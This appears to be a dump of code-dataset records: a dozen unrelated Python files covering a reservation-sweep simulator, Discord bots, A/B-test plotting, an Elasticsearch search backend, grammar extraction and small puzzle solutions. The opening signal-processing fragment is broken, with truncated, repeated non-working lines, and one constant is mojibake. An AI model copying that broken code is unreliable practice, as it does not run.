pItem.dataParam.reset_index(drop=True).ix[0]\r\n y = np.array(pItem.rawData[para[self.channelIdKey]])\r\n\r\n\r\n #calibration and unit\r\n if pItem.processParam[self.isUncalibratedSignalKey]:\r\n yUnit = para[self.Y_Unit_LabelKey]\r\n else:\r\n y = y*float(para[self.calibrationKey])\r\n yUnit = para[self.unitKey]\r\n\r\n #smooth\r\n if pItem.processParam[self.isSmoothKey]:\r\n if pItem.processParam[self.nSmoothKey].isdigit():\r\n if 0xRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (thighestValue else highestValue\n myChanges.update({key:deepcopy(values)})\n if number_only:\n return highestValue\n else:\n return deepcopy(myChanges),deepcopy(multipliers)\n \ndef reservationSweep(SweepInput,ourInput,origInput):\n\n #first get the name of the reservation sweep applies to\n myName = SweepInput[\"name\"] if dictHasKey(SweepInput,\"name\") else False\n if myName == False:\n print(\"Error no name in reservation sweep. We don't know what reservation you want to sweep over.\")\n myDebug()\n sys.exit()\n #get the reservation\n resv=deepcopy(origInput[\"reservations-%s\"%myName])\n #now iterate over the reservation-array\n count = 0\n #allChanges is a gauge of how many changes are in resvTypes. Each resvType should have the same amount of changes\n allChanges = 0\n #countingChanges is the amount of changes total for this resvType\n countingChanges = 0\n allReservations = []\n for resvType in resv[\"reservations-array\"]:\n #ok we have a type apply the corresponding SweepInput\n sweeps = SweepInput[\"reservations-array\"][count]\n #changes are how many different experiments are going to result from the base sweep(non-multiplier)\n changes = determineNumChanges(sweeps)\n #myChanges are the dict of non-multiplier key:values pair where # values=changes\n #multipliers is a dict(key of multiplier #) of non-parsed dicts ( [multiplier-key][key][non-parsed value] )\n myChanges,multipliers = getMyChanges(sweeps,changes)\n \n \n #now integrate the changes with what's there\n #TODO there are conflicting keys: submit-before-start or submit\n #TODO interval or resources\n #TODO and optional keys: repeat-every\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = [valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #myReservations is the list of experiments using resvType as a base and swept over\n #after this loop it holds only non-multiplier experiments\n myReservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n myReservations.append(deepcopy(reservation))\n if len(multipliers) == 0:\n if allChanges == 0:\n allChanges = changes\n elif allChanges != changes:\n print(f\"Error! This reservation type in reservation-sweep has an unequal amount of changes than previous types.\")\n print(f\"Previous changes: {allChanges} Current changes: {changes}\")\n myDebug()\n sys.exit()\n if len(multipliers) > 0:\n #countingChanges keeps track of all the changes for this resvType ( number of experiments )\n countingChanges = changes\n #ok we have multipliers\n #first take all the keys and sort them\n aListOfKeys = list(multipliers.keys())\n aListOfKeys.sort(key=functions.natural_keys)\n #ok they are sorted, now iterate\n neg_reservations = []\n pos_reservations = []\n for multiplierKey in aListOfKeys:\n #lets iterate through all the sweep keys for this multiplier\n multiplierDict = multipliers[multiplierKey]\n #changes is # of values for this multiplierKey\n changes = determineNumChanges(multiplierDict)\n # myChanges is the key:values dict where # values = changes\n myChanges=getMyChanges(multiplierDict,changes)[0]\n #are these normal multipliers, or are they non-multiplier multipliers?\n if (multiplierKey.find(\"-\") == -1) and (multiplierKey.find(\"+\") == -1):\n #so we have the changes for a single multiplier. Make reservations out of it\n #based on each reservation we already added from non-multipliers.\n #myReservations are all the reservations(experiments) for this resvType appended\n holdingReservations = deepcopy(myReservations)\n for holdingReservation in holdingReservations:\n tmpChanges = deepcopy(myChanges)\n\n \n #tmpChanges is myChanges which is the key:values dict where # values = changes\n #go through each key in the holdingReservation. If it already exists in tmpChanges\n #then skip it, the values were already made for that key. If not, take what is in\n #the holdingReservation and multiply it by # values (changes) and add that key to tmpChanges with those values\n for key in holdingReservation.keys():\n if key == \"machines\":\n for machineKey in holdingReservation[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = holdingReservation[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n tmpChanges.update({machineKey:values})\n else:\n if key in tmpChanges.keys():\n continue\n valueOfKey = holdingReservation[key]\n values = [valueOfKey]*changes\n tmpChanges.update({key:values})\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in tmpChanges.keys():\n if key in MACHINE_KEYS:\n machines[key] = tmpChanges[key][i]\n else:\n reservation[key] = tmpChanges[key][i]\n reservation[\"machines\"] = functions.orderDict(machines,MACHINES_ORDER)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n myReservations.append(deepcopy(reservation))\n \n countingChanges= countingChanges + countingChanges*changes\n #ok the multiplier key is negative. This is a set of reservations not multiplied by multipliers\n elif multiplierKey.find(\"-\") != -1:\n #populate the myChanges dict with what is already in the original reservation if not specified in this multiplier key\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = [valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #ok now make reservations out of myChanges\n key_reservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n key_reservations.append(deepcopy(reservation))\n #keep putting the reservations at the beginning (-1 will have a lower number experiment # than -5 as -5 will be processed first)\n neg_reservations=deepcopy(key_reservations) + neg_reservations\n elif multiplierKey.find(\"+\") != -1:\n #populate the myChanges dict with what is already in the original reservation if not specified in this multiplier key\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = [valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #ok now make reservations out of myChanges\n key_reservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n key_reservations.append(deepcopy(reservation))\n #keep putting the reservations at the end (+1 will come before +5)\n pos_reservations.extend(deepcopy(key_reservations))\n \n \n countingChanges+=len(neg_reservations)+len(pos_reservations)\n #I want to put negative reservations before the multiplied ones\n myReservations=deepcopy(neg_reservations)+myReservations+deepcopy(pos_reservations)\n # we are now done adding reservations of this type since we have gone through all the multiplier keys for this type \n if allChanges == 0:\n allChanges = countingChanges\n elif allChanges != countingChanges:\n print(f\"Error! This reservation type in reservation-sweep has an unequal amount of changes than previous types.\")\n print(f\"Previous changes: {allChanges} Current changes: {countingChanges}\")\n myDebug()\n sys.exit()\n \n #now add these new reservations to the list of allReservations. allReservations[0] will be all of the reservations of type reservations-array[0]\n # allReservations[1] will be all of the reservations of type reservations-array[1]\n allReservations.append(deepcopy(myReservations))\n #allReservations[0..] holds lists of all the experiments\n #allReservations[0][0] holds experiment_xtra1 reservation Type 1\n #allReservations[1][0] holds experiment_xtra1 reservation Type 2\n #allReservations[0][1] holds experiment_xtra2 reservation Type 1\n #...\n\n #if any list in allReservations doesn't hold the amount of changes(experiments)\n #that the others have (dictated by allChanges) then increase it by allChanges\n #this assumes (correctly) that it either holds allChanges' size list or size 1\n \n for i in range(0,len(allReservations),1):\n if len(allReservations[i]) != allChanges:\n allReservations[i]=allReservations[i] * allChanges\n \n #now put together the experiments\n allReservationsJson = []\n for i in range(0,allChanges,1):\n reservationJson = json.loads(json.dumps({}))\n reservationJson[\"reservations-array\"]=[ deepcopy(resvType[i]) for resvType in allReservations]\n allReservationsJson.append(deepcopy(reservationJson))\n\n \n #we can start adding the reservations to what is already there\n \n currentExperiments = len(ourInput.keys())\n #if there were no sweeps before\n # really this is a formality, there should better be sweeps before (like nodes!) \n if currentExperiments == 0: \n for i in range(0,allChanges,1):\n ourInput[\"experiment_{count}\".format(count=i+1)]={\"resv\":allReservationsJson[i]}\n #there were sweeps before -- definitely the more likely scenario\n else:\n #first make a copy so we know what the original was\n #we are editing ourInput\n tmpInput = deepcopy(ourInput)\n count = 1\n numOrigKeys = currentExperiments\n deletedTmpInput = False\n skipAlreadyThere = False\n # update the current experiments first\n # we will update them with just the first new reservationJson\n # then after that we will add new experiments starting with the second new reservationJson\n # so iterate over the keys(experiments) in ourInput\n \n for ikey in ourInput.keys():\n data = deepcopy(ourInput[ikey])\n #about to set the resv to this experiment\n #however, first check that it doesn't already have resv\n #if it does then we are talking about a 2nd,3rd... reservation-sweep\n if dictHasKey(data,\"resv-sweep-number\"):\n #we delete tmpInput because this isn't the first time we are seeing a reservation-sweep\n #that means tmpInput already has reservations associated with it\n # we will update tmpInput to include only the original experiments, before we added ANY\n # reservations, then we will add updated versions of these original experiments WITH our new\n # reservations generated from this particular reservation-sweep\n \n\n # suppose we did a node sweep: 1,2,3\n # ourInput: 3 sims\n # n1\n # n2\n # n3\n # reservation-sweep 1 had 2 changes\n # ourInput: now 6 sims\n # n1 resv1 n1 resv2\n # n2 resv1 n2 resv2\n # n3 resv1 n3 resv2\n #\n # This would be the current state of ourInput and would transfer to tmpInput since we copy it above\n # What we mean to do with a second reservation-sweep is just apply the changes as if applied to the original\n # 3 node sweep\n # reservation-sweep 2 had 3 changes\n # ourInput: now 15 sims\n # n1 resv1 n1 resv2 n1 resv3 n1 resv4 n1 resv5\n # n2 resv1 n2 resv2 n2 resv3 n2 resv4 n2 resv5\n # n3 resv1 n3 resv2 n3 resv3 n3 resv4 n3 resv5\n # however if we kept tmpInput as it was we would have this:\n # ourInput: now 24 sims 9+ than it should. Notice resv3,resv4,resv5 are repeated. No extra knowledge will come of it\n # n1 resv1 n1 resv2 n1 resv3 n1 resv3 n1 resv4 n1 resv4 n1 resv5 n1 resv5\n # n2 resv1 n2 resv2 n2 resv3 n2 resv3 n2 resv4 n2 resv4 n2 resv5 n2 resv5\n # n3 resv1 n3 resv2 n3 resv3 n3 resv3 n3 resv4 n3 resv4 n3 resv5 n3 resv5\n\n # We keep a record of the original ourInput by first storing the current number of experiments\n # subsequently we store the amount of changes made, this isn't used yet\n # So we get the amount of original sims from ourList[0] and only include the sim in tmpInput\n # if the current experiment number is less than or equal to it\n # \n # we don't add any of these reservations to the original, that would delete what was already there\n # so we change the starting point when iterating allReservationsJson to include the first reservationJson\n # \n\n if deletedTmpInput == False:\n tmpInput = {}\n deletedTmpInput = True\n \n ourList = deepcopy(data[\"resv-sweep-number\"])\n numExperimentsToAddPerResvJson = ourList[0]\n currentExpNum = int(str(ikey).strip(\"experiment_\"))\n if currentExpNum <= numExperimentsToAddPerResvJson:\n tmpInput.update({ikey:data})\n ourList.append(len(allReservationsJson))\n data[\"resv-sweep-number\"]=deepcopy(ourList)\n \n skipAlreadyThere = True\n count+=1\n continue\n else:\n data[\"resv-sweep-number\"]=deepcopy([numOrigKeys,len(allReservationsJson)])\n data[\"resv\"] = json.dumps(allReservationsJson[0])\n ourInput[ikey] = data\n #this keeps track of what experiment number we are on\n count+=1\n start = 1\n if skipAlreadyThere:\n start = 0\n \n for i in range(start,len(allReservationsJson),1):\n # we skip the first, if we already did it\n # now iterate over the original \"ourInput\" and add our resv to it\n for jkey in tmpInput.keys():\n data = deepcopy(tmpInput[jkey])\n if dictHasKey(data,\"resv-sweep-number\"):\n ourList = deepcopy(data[\"resv-sweep-number\"])\n ourList.append(len(allReservationsJson))\n data[\"resv-sweep-number\"]=deepcopy(ourList)\n else:\n data[\"resv-sweep-number\"]=deepcopy([numOrigKeys,len(allReservationsJson)])\n \n data[\"resv\"] = json.dumps(allReservationsJson[i])\n ourInput[\"experiment_{count}\".format(count=count)] = data\n #again this keeps track of what experiment number we are on\n count+=1\n\n","repo_name":"cswalke1/simulator","sub_path":"basefiles/sweeps/reservation_sweep.py","file_name":"reservation_sweep.py","file_ext":"py","file_size_in_byte":23298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26320207286","text":"from pathlib import Path\n\nimport csv\n\nfrom connection import *\n\n\nif __name__ == '__main__':\n init()\n\n input_path = Path(\"./random_strings_edited.csv\")\n\n with input_path.open(\"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n insert_line(row)\n\n for row in get_all_rows():\n print(row)\n","repo_name":"Valemos/ozzylogik_jun_python_dev","sub_path":"mysql/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31290122346","text":"import nltk\nfrom nltk.corpus import treebank\nfrom nltk.grammar import CFG, Nonterminal\n\nfreq_count = {}\n\ndef replace_chars(string):\n string = string.replace(\"#\", \"HASH\")\n string = string.replace(\":\", \"COLON\")\n string = string.replace(\",\", \"COMMA\")\n string = string.replace(\".\", \"PERIOD\")\n return string\n\nfor sent in treebank.parsed_sents():\n sent.chomsky_normal_form()\n for production in sent.productions():\n if production.is_nonlexical():\n lhs = production.lhs()\n rhs = production.rhs()\n if lhs in freq_count and rhs in freq_count[lhs]:\n freq_count[lhs][rhs]+=1\n elif lhs in freq_count:\n freq_count[lhs][rhs] = 1\n else:\n freq_count[lhs] = {}\n freq_count[lhs][rhs] = 1\n\ngrammar_file = open('grammar_test.gr', 'w')\ngrammar_file.write('99 TOP S\\n')\n\nfor nonterminal in freq_count:\n for prod in freq_count[nonterminal]:\n if freq_count[nonterminal][prod] > 0:\n grammar_file.write('{} {} '.format(freq_count[nonterminal][prod], replace_chars(str(nonterminal))))\n for p in prod:\n grammar_file.write(replace_chars(str(p)) + \" \")\n grammar_file.write(\"\\n\")\n\n","repo_name":"bnelo12/Parser-Competition","sub_path":"get_nonterminal_prob.py","file_name":"get_nonterminal_prob.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41858171925","text":"import discord\nimport asyncio\nfrom datetime import datetime\nimport gspread \nfrom oauth2client.service_account import ServiceAccountCredentials\nimport mysql.connector\nfrom numpy import exp, dot, random, array\nimport random\n\nimport SecretStuff\nimport MoBotDatabase\n\nmoBot = 449247895858970624\nmoBotTest = 476974462022189056\nmo = 405944496665133058\n\nspaceChar = \"Рађ\"\n\nasync def main(args, message, client):\n now = datetime.now()\n for i in range(len(args)):\n args[i].strip()\n# end main\n\nasync def mainReactionAdd(message, payload, client): \n pass\n# end mainReactionAdd\n\nasync def mainReactionRemove(message, payload, client):\n pass\n# end mainReactionRemove\n\nasync def memberJoin(member):\n pass\n# end memberJoin\n\nasync def memberRemove(member, client):\n pass\n# end memberRemove\n\ndef play(mode):\n def checkForWinner(board):\n checks = []\n\n diagCheck1 = []\n diagCheck2 = []\n\n for i in range(3): \n diagCheck1.append(board[i+(i*3)])\n diagCheck2.append(board[i*2+2])\n\n rowCheck = []\n colCheck = []\n\n for j in range(3):\n rowCheck.append(board[i*3+j])\n colCheck.append(board[j*3+i])\n\n checks.append(rowCheck)\n checks.append(colCheck)\n\n checks.append(diagCheck1)\n checks.append(diagCheck2)\n\n winner = None\n for check in checks:\n checkSpot = None\n i = 0\n while True:\n checkSpot = check[i]\n if (checkSpot == \" \"):\n break\n\n i += 1\n if (checkSpot != check[i]):\n break\n elif (i is 2):\n if (checkSpot == check[i]):\n winner = check[i]\n return winner\n break\n return winner\n # end checkForWinner\n\n def displayBoard(board):\n for i in range(0, 9, 3):\n print(\"|\".join(board[i:i+3]))\n # end displayBoard\n\n def goPlayer(mode, players, playerTurn, board):\n def checkIfOpen(spot, board):\n return board[spot] == \" \"\n # end checkIfOpen\n\n while True:\n if (mode is 1):\n spot = random.randint(0, 8)\n\n if (checkIfOpen(spot, board)):\n board[spot] = \"X\" if ((playerTurn + 1) // 2 is 0) else \"O\"\n return board\n # end goPlayerOne\n\n players = []\n r = random.random()\n if (mode is 1):\n players = [\"PC1\", \"PC2\"]\n else:\n if (r > .5):\n players = [\"PC1\", \"Human\"]\n else:\n players = [\"Human\", \"PC2\"]\n\n print(\"\\nX: %s\\nO: %s\\n\" % (players[0], players[1]))\n\n board = [\" \"] * 9\n\n playerTurn = 1\n while True: # game loop\n playerTurn = playerTurn * -1\n\n print(\"Go %s\" % (\"X\" if ((playerTurn + 1) // 2 is 0) else \"O\"))\n board = goPlayer(mode, players, playerTurn, board)\n displayBoard(board)\n\n winner = checkForWinner(board)\n if (winner is not None):\n return \"Winner: %ss\" % winner\n input()\n # end while\n# end play\n\nprint(play(1))\n#play(int(input(\"PC vs PC: 1\\nHuman vs PC: 2\\nChoose 1 or 2: \")))","repo_name":"nosv1/MoBot","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30665913043","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\npd.set_option('display.max_columns', None)\n\n\nab_data = pd.read_csv('C:/Users/nick-/Documents/DS/projects/SF_tasks/ab_data.csv', sep=',')\n\nab_data['timestamp'] = pd.to_datetime(ab_data['timestamp'], format='%Y-%m-%d')\n\ndaily_data = ab_data.groupby(['timestamp', 'group']).agg({\n 'user_id':'count',\n 'converted':'sum'\n})\\\n .reset_index().rename(columns={'user_id': 'users_count'})\n\ndaily_data['conversion'] = daily_data['converted']/daily_data['users_count']*100\n\n\n# # создаём фигуру размером 8x4\n# fig = plt.figure(figsize=(8, 4))\n# # # добавляем систему координат\n# # ax = fig.add_axes([8, 4, 1, 1])\n# # строим boxplot для conversion по признаку group\n# sns.boxplot(data=daily_data, x='conversion', y='group')\n#\n#\n# plt.show()\n\n\n\n# conversion_piv = daily_data.groupby('group')['conversion'].agg(\n# ['mean', 'median']\n# )\n# print(conversion_piv)\n\n\n'''смотрим конверсии по дням'''\n# # создаём фигуру размером 8x4\n# fig = plt.figure(figsize=(8,4))\n# # добавляем систему координат\n# ax = fig.add_axes([0.1, 0.2, 0.8, 0.7])\n# # строим lineplot для конверсии во времени в каждой группе\n# sns.lineplot(\n# data=daily_data,\n# x='timestamp',\n# y='conversion',\n# hue='group',\n# ax=ax\n# )\n# # задаём подпись к графику\n# ax.set_title('График конверсии по дням')\n# # задаём поворот меток на оси абсцисс\n# ax.xaxis.set_tick_params(rotation=45)\n# # задаём отображение сетки\n# ax.grid();\n# plt.show()\n\n'''смотрим данные кумулятивным итогом'''\n# # выделяем данные группы А\n# daily_data_a = daily_data[daily_data['group'] == 'A']\n# # считаем кумулятивное количество посетителей\n# daily_data_a.loc[:, 'cum_users_count'] = daily_data_a['users_count'].cumsum()\n# # выводим время, количество посетителей и кумулятивное количество посетителей\n# print(daily_data_a[['timestamp', 'users_count', 'cum_users_count']].head())\n\n\n'''считаем кумултивные данные сразу для двух групп'''\n# вычисляем кумулятивную сумму количества посетителей\ndaily_data['cum_users_count'] = daily_data.groupby(['group'])['users_count'].cumsum()\n# вычисляем кумулятивную сумму количества совершённых целевых действий\ndaily_data['cum_converted'] = daily_data.groupby(['group'])['converted'].cumsum()\n# вычисляем кумулятивную конверсию\ndaily_data['cum_conversion'] = daily_data['cum_converted']/daily_data['cum_users_count'] * 100\n# print(daily_data.head())\n\n\n'''строим график кумулятивной конверсии'''\n# создаём фигуру размером 8x4\nfig = plt.figure(figsize=(12, 6))\n# добавляем систему координат\nax = fig.add_axes([0.1, 0.2, 0.8, 0.7])\n# строим lineplot для кумулятивной конверсии во времени в каждой группе\nsns.lineplot(x='timestamp', y='cum_conversion', data=daily_data, hue='group', ax=ax)\n# задаём подпись к графику\nax.set_title('График кумулятивной конверсии по дням')\n# задаём поворот меток на оси абсцисс\nax.xaxis.set_tick_params(rotation = 45)\n# задаём отображение сетки\nax.grid(True)\nplt.show()","repo_name":"nickkh1/PycharmProjects1","sub_path":"DS_skillfactory/MOD_18_EDA/EDA_10_AB_testing.py","file_name":"EDA_10_AB_testing.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14169786819","text":"\"\"\"Base search backend.\"\"\"\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom django_elasticsearch_dsl import fields\nfrom rest_framework.filters import BaseFilterBackend\nfrom rest_framework.settings import api_settings\n\nfrom ..mixins import FilterBackendMixin\nfrom ...compat import coreapi, coreschema\nfrom ...constants import MATCHING_OPTIONS, DEFAULT_MATCHING_OPTION\n\n__title__ = 'django_elasticsearch_dsl_drf.filter_backends.search.common'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n 'BaseSearchFilterBackend',\n)\n\n\nclass BaseSearchFilterBackend(BaseFilterBackend, FilterBackendMixin):\n \"\"\"Base search filter backend.\"\"\"\n\n query_backends = []\n\n matching = DEFAULT_MATCHING_OPTION\n\n search_param = api_settings.SEARCH_PARAM\n\n def get_search_query_params(self, request):\n \"\"\"Get search query params.\n\n :param request: Django REST framework request.\n :type request: rest_framework.request.Request\n :return: List of search query params.\n :rtype: list\n \"\"\"\n query_params = request.query_params.copy()\n return query_params.getlist(self.search_param, [])\n\n def get_query_backends(self, request, view):\n \"\"\"Get query backends.\n\n :return:\n \"\"\"\n raise NotImplementedError(\n \"You should define `get_query_backends` method in your {} class\"\n \"\".format(self.__class__.__name__)\n )\n\n def _get_query_backends(self, request, view):\n \"\"\"Get query backends internal.\n\n :param request:\n :param view:\n :return:\n \"\"\"\n try:\n return self.get_query_backends(request, view)\n except NotImplementedError as err:\n pass\n\n if not self.query_backends:\n raise NotImplementedError(\n \"Your search backend shall either implement \"\n \"`get_query_backends` method or define `query_backends`\"\n \"property.\"\n )\n return self.query_backends[:]\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"Filter the queryset.\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n if self.matching not in MATCHING_OPTIONS:\n raise ImproperlyConfigured(\n \"Your `matching` value does not match the allowed matching\"\n \"options: {}\".format(', '.join(MATCHING_OPTIONS))\n )\n\n __query_backends = self._get_query_backends(request, view)\n\n if len(__query_backends) > 1:\n __queries = []\n for query_backend in __query_backends:\n __queries.extend(\n query_backend.construct_search(\n request=request,\n view=view,\n search_backend=self\n )\n )\n\n if __queries:\n queryset = queryset.query(\n 'bool',\n **{self.matching: __queries}\n )\n\n elif len(__query_backends) == 1:\n __query = __query_backends[0].construct_search(\n request=request,\n view=view,\n search_backend=self\n )\n queryset = queryset.query('bool', **{self.matching: __query})\n\n else:\n raise ImproperlyConfigured(\n \"Search filter backend shall have at least one query_backend\"\n \"specified either in `query_backends` property or \"\n \"`get_query_backends` method. Make appropriate changes to\"\n \"your {} class\".format(self.__class__.__name__)\n )\n\n return queryset\n\n def get_coreschema_field(self, field):\n if isinstance(field, fields.IntegerField):\n field_cls = coreschema.Number\n else:\n field_cls = coreschema.String\n return field_cls()\n\n def get_schema_fields(self, view):\n assert coreapi is not None, 'coreapi must be installed to ' \\\n 'use `get_schema_fields()`'\n assert coreschema is not None, 'coreschema must be installed to ' \\\n 'use `get_schema_fields()`'\n\n _search_fields = getattr(view, 'search_fields', None)\n if isinstance(_search_fields, dict):\n search_fields = list(_search_fields.keys())\n else:\n search_fields = _search_fields\n\n return [] if not search_fields else [\n coreapi.Field(\n name=self.search_param,\n required=False,\n location='query',\n schema=coreschema.String(\n description='Search in '\n '{}.'.format(', '.join(search_fields))\n )\n )\n ]\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/filter_backends/search/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"6508892693","text":"import discord\nimport random\nfrom discord.ext import commands\nfrom listofnames import first_names, last_names\n# from dotenv import load_dotenv\n# load_dotenv()\nclass RandomFunc(commands.Cog):\n def __init__(self , bot):\n self.bot = bot\n\n @commands.command(aliases = ['rand'])\n async def randomname(self , ctx , *args):\n if(len(args)==1):\n num = int(args[0])\n if(num<=5 and num>0):\n final_msg = \"\"\n for i in range(num):\n f_ind = random.randint(0 , len(first_names)-1)\n l_ind = random.randint(0 , len(last_names)-1)\n random.shuffle(first_names)\n random.shuffle(last_names)\n name = first_names[f_ind] + \" \" + last_names[l_ind]\n final_msg = final_msg + name + \"\\n\"\n \n await ctx.send(final_msg)\n\n elif(num==0):\n await ctx.send(\"Do you really want a name or you just want to waste my time?\") \n else:\n await ctx.send(\"How many names do you need man! :nerd:\")\n elif(len(args)==0):\n f_ind = random.randint(0 , len(first_names)-1)\n l_ind = random.randint(0 , len(last_names)-1)\n random.shuffle(first_names)\n random.shuffle(last_names)\n name = first_names[f_ind] + \" \" + last_names[l_ind]\n await ctx.send(name)\n else:\n await ctx.send(\"Send valid arguments :nerd:\")\n \n @commands.command(aliases = ['nrand'])\n async def randomnum(self , ctx , *args):\n try:\n num1 = int(args[0])\n num2 = int(args[1])\n if(num1>num2):\n await ctx.send('First argument should be less than the second one')\n elif(num1==num2):\n await ctx.send('Do you really want a random number :|')\n else:\n randnum = random.randint(num1 , num2)\n await ctx.send(randnum)\n except:\n await ctx.send('Please send valid input :pleading_face:')\n\ndef setup(bot):\n bot.add_cog(RandomFunc(bot))","repo_name":"delta7-138/HugoBot","sub_path":"cogs/randomfunc.py","file_name":"randomfunc.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22787745107","text":"class Solution:\r\n def getModifiedArray(self, length: int, updates: List[List[int]]) -> List[int]:\r\n #Time: O(n)\r\n #Space: O(n)\r\n \r\n #Mark down what happens at each idx\r\n inc = [0] * length\r\n dec = [0] * length\r\n \r\n for start, end, add in updates:\r\n inc[start] += add #Add this up before assigning to output\r\n dec[end] += add #Cancel out with this before moving on to the next idx\r\n \r\n #Update the output arrray according to our prefix sum\r\n output = [None for _ in range(length)]\r\n prefixSum = 0\r\n \r\n for idx in range(length):\r\n prefixSum += inc[idx]\r\n output[idx] = prefixSum\r\n prefixSum -= dec[idx]\r\n \r\n return output","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0370-Range-Addition.py","file_name":"0370-Range-Addition.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42982971215","text":"import setuptools\n\nwith open(\"README.md\", 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"Ddnet\",\n version=\"0.0.5\",\n author=\"Zichuana\",\n author_email=\"2092653757@qq.com\",\n description=\"This is a test. This project is not very useful!!!\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Zichuana/Ddnet\",\n packages=setuptools.find_packages(),\n install_requires=['pandas', 'matplotlib', 'numpy', 'scipy', 'pandas_profiling', 'folium', 'seaborn', 'random', 'os'],\n # add any additional packages that needs to be installed along with SSAP package.\n\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"Zichuana/Ddnet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10151279208","text":"def memoize(f):\n cache = {}\n return lambda *args: cache[args] if args in cache else cache.update({args: f(*args)}) or cache[args]\n\n@memoize\ndef fib(n):\n return n if n < 2 else fib(n-2) + fib(n-1)\n\n# Clean memoized fibonacci calculator\n\ndef problem2():\n acc = 0 \n n = 1\n while fib(n) < 4000000:\n fibs = fib(n)\n if fibs % 2 == 0:\n acc += fibs\n n += 1\n return acc\n","repo_name":"respectus/Euler-Problems","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26052468992","text":"import re\nfrom typing import Generator\n\nfrom turkish_morphology import analysis_pb2\nfrom turkish_morphology import fst\nfrom turkish_morphology import pretty_print\n\nfrom external.org_openfst import 